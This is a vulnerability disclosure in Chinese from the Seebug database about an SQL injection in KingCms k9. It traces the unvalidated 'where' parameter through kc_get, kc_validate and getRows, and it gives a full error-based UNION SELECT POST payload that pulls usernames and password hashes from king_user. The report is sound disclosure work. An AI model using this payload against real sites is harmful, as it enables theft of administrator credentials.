KingCms最新版(k9)注入又1枚

2015-03-18T00:00:00
ID SSV:94889
Type seebug
Reporter Root
Modified 2015-03-18T00:00:00

Description

简要描述:

KingCms最新版(k9)注入又1枚

详细说明:

朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。 在wooyun上看到了几个漏洞,如: WooYun: kingcms最新版sql注入漏洞 注入点:POST /apps/jiaoyou/index.php HTTP/1.1 注入参数:where 问题文件在 /apps/jiaoyou/index.php

``` function _create(){ $u=new user;$u->auth_role('jiaoyou'); $db=new db; $cmd=kc_get('cmd',array('categroy','content'));

$file=new file;
if($cmd=='content'){
    $where=kc_get('where',0,1);
    $pid=kc_get('pid',2,1);
    $rn=kc_get('rn',2,1);
    $limit=($rn*($pid-1)).','.$rn.';';
    $pcount=kc_get('pcount',2,1);
    $start=$rn*$pid>$pcount?$pcount:$rn*$pid;
    $res=$db->getRows('%s_jiaoyou','*',$where,'',$limit);
    foreach($res as $rs){
        //process file to rela path
        $rs['TEMPLATE']='jiaoyou/info.php';
        $file->create($rs['url'],$rs,'apps/jiaoyou/_info.php');
    }
    /*
}else if($cmd=='area' || $cmd=='cat'){
    $res=$db->getRows('%s_node','*',$where,'',$limit);
    foreach($res as $rs){
        $fpath="jiaoyou/{$rs['url']}/";
        $file->create($fpath,$rs,'apps/jiaoyou/_node.php');
    }
     */
}else if($cmd=='categroy'){
    //遍历地区
    $node=new node;
    $areas=$node->getRows('area');
    $types=$node->getRows('jiaoyou_type');//$db->getRows('%s_node','url,name','cid=6');
    //$areas=$db->getRows('%s_node','url,name','cid=1');
    foreach($areas as $a){
        //遍历分类
        foreach($types as $t){
            $fpath=kc_config('jiaoyou.dir').$a['url'].'_'.$t['url'].'/';//"{$a['url']}_{$t['url']}/";
            $array=array(
                'title'=>$a['name']."所有".$t['name'].'信息',
                'name'=>$a['name']."所有".$t['name'].'信息',
                'where'=>"status=1 and online=1 and area='{$a['url']}' and type='{$t['url']}'",
                'area'=>$a['url'],
                'type'=>$t['url'],
                'TEMPLATE'=>'jiaoyou/categroy.php',
            );
            $file->create($fpath,$array);
        }

无关代码 ```

$where是这样获得的,$where=kc_get('where',0,1);我们去看看kc_get

function kc_get($name,$type=2,$is=0){ $get = isset($_GET[$name]) ? $_GET[$name] : false; //若GET为空,则POST方式获取值 if (AJAX==1 && $get===false) { $get = isset($_POST[$name]) ? $_POST[$name] : false; } if(!empty($get)){//如果有值,则判断类型 if(!kc_validate($get,$type)){ kc_tip('URL参数 '.$name.' 类型不正确!','form'); } } if($is && $get===false){//要求有值的时候判断 kc_tip('URL参数 '.$name.' 不能为空!','form'); } return $get; }

又调用了kc_validate,再去看看

function kc_validate($s,$type){ $reg=''; switch($type){ case 1:$reg='/^[a-zA-Z0-9]+$/';break; case 2:$reg='/^[0-9]+$/';break; case 3:$reg='/^([0-9]+,)*[0-9]+$/';break; case 4:$reg='/^[A-Za-z0-9\_]+$/';break; case 5: $reg='/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/';break; case 6: $reg='/^[a-zA-Z]{3,10}:\/\/[^\s]+$/'; break; case 7: $reg='/^([a-zA-Z]{3,10}:\/\/)?[^\s]+\.(jpeg|jpg|gif|png|bmp)$/'; break; case 8: $reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29)) (20|21|22|23|[0-1]?\d):[0-5]?\d:[0-5]?\d$/'; break; case 9: $reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29))$/'; break; case 10:$reg='/^\d?\.\d?\.\d{4}$/';break; case 11:$reg='/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/';break; case 12:$reg='/^(\d+(\.\d+)?)$/';break; case 13:$reg='/^([0-9A-Za-z]+,)*[0-9A-Za-z]+$/';break; case 14:$reg='/^#?[0-9A-Fa-f]{6}$/';break; case 15:$reg='/^([a-zA-Z0-9\_\-]+\/)+$/'; $s=preg_replace('/\{([a-zA-Z0-9]+)\}/','$1',$s);//替换{ID}等类型为ID $path=preg_replace('/(([a-zA-Z0-9\_\-]+\/)*)([a-zA-Z0-9\_\-]+\/)/','$3',$s); //kc_tip($path,'form'); //if(preg_match('/^[pP]\d+$/',$path)){return false;} break; case 17:$reg='/^([a-zA-Z]{3,10}:\/\/)[^\s]+$/';break; case 18: $reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29)) (20|21|22|23|[0-1]?\d):[0-5]?\d$/'; break; case 22:$reg='/^(\-|\+)?[0-9]+$/';break; case 23:$reg='/^[a-zA-Z][a-zA-Z0-9\_]*/';break; case 24:$reg='/^([a-zA-Z0-9\-_]+\/)+$/';break; case 25:$reg='/[a-zA-Z0-9\+\%]+(\=)*$/';break; case 33:$reg='/^(\-?[0-9]+\,?)+$/';break; case 34:$reg="/^[^\s!-\/:-@\[-`\{-~]+$/";break; default:$reg=$type;break; } //如果为数组类型 if (is_array($reg)) { $bool=in_array($s,$reg); }else{ $bool= empty($type) ? true : (empty($reg) ? false : (bool)preg_match($reg,$s)); } return $bool; }

因为在使用kc_get得到where时,参数type是0,因此,kc_validate的参数type也是0,也就使得kc_validate返回true。也就是说再得到where时,没有对where进行类型的检验,可以引入单引号,造成了注入。 $_POST['where']进入$db->getRows,去看看$db->getRows

public function getRows($table,$insql='*',$where=null,$order=null,$limit=null,$group=null) { $table=str_replace('%s',DB_PRE,$table); $sql="SELECT $insql FROM $table "; $sql.= empty($where) ? '' : " WHERE $where"; $sql.= empty($group) ? '' : " GROUP BY $group"; $sql.= empty($order) ? '' : " ORDER BY $order"; $sql.= empty($limit) ? '' : " LIMIT $limit"; return $this->get($sql); }

在执行sql语句之前,也没有过滤,这里就造成了注入。 Kingcms可以报错,因此 Payload:

jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23

注入成功,见下图

<img src="https://images.seebug.org/upload/201503/17234728a2a84061a7201f6e8725941ce9e4fed0.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">

漏洞证明:

见 详细说明